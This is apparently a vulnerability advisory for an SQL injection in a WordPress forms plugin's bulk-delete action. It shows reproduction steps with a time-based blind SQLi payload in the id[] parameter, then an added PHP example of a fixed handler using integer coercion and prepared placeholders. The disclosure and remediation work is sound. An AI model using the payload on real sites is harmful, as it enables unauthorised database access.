The plugin does not properly escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users.
Access the submissions page at https://example.com/wp-admin/admin.php?page=html-forms&view=edit&form_id=form_ID&tab=submissions. Capture the request sent after performing a Move to Trash action, then replace the Submission ID with the SQLi payload, e.g. _hf_admin_action=bulk_delete_submissions&_wpnonce=nonce&id[]=1) AND (SELECT 2179 FROM (SELECT(SLEEP(5)))xaXr) AND (4033=4033
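The root cause above is an id[] value concatenated into a DELETE statement unescaped. The following is an added example of a hardened bulk-delete handler, not the plugin's own code; the function name, table name and use of $wpdb are assumptions, while the id[] request shape follows the request shown on this page.

```php
<?php
// Added example, not taken from the plugin. Assumes WordPress' global $wpdb
// and a hypothetical submissions table named {$wpdb->prefix}hf_submissions.
//
// Vulnerable pattern this replaces (string concatenation, no escaping):
//   $wpdb->query( "DELETE FROM $table WHERE id IN (" . implode( ',', $_POST['id'] ) . ")" );
function hf_example_bulk_delete_submissions( array $raw_ids ) {
    global $wpdb;

    // Only an administrator-level user should reach this action, and the
    // request must carry a valid nonce for it.
    if ( ! current_user_can( 'manage_options' ) ) {
        return 0;
    }
    check_admin_referer( 'bulk_delete_submissions' );

    // Coerce every submitted id to a non-negative integer; absint() turns
    // a payload such as "1) AND (SELECT ..." into 1, and zeros are dropped.
    $ids = array_values( array_filter( array_map( 'absint', $raw_ids ) ) );
    if ( empty( $ids ) ) {
        return 0;
    }

    // One %d placeholder per id so $wpdb->prepare() binds each value
    // itself instead of trusting the request string.
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $table        = $wpdb->prefix . 'hf_submissions'; // hypothetical table

    $sql = $wpdb->prepare(
        "DELETE FROM {$table} WHERE id IN ({$placeholders})",
        $ids
    );

    return $wpdb->query( $sql );
}

// Wiring for the admin action named in the request on this page.
if ( isset( $_POST['_hf_admin_action'] ) && 'bulk_delete_submissions' === $_POST['_hf_admin_action'] ) {
    hf_example_bulk_delete_submissions( (array) ( $_POST['id'] ?? array() ) );
}
```

With the integer coercion and placeholders in place, the time-based payload shown above collapses to a delete of submission 1 and the SLEEP(5) never reaches the database, which is also the quickest way to confirm a fix: the response time no longer changes with the payload.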
Nguyen Duy Quoc Khanh
Yes
2022-11-07 (about 10 months ago)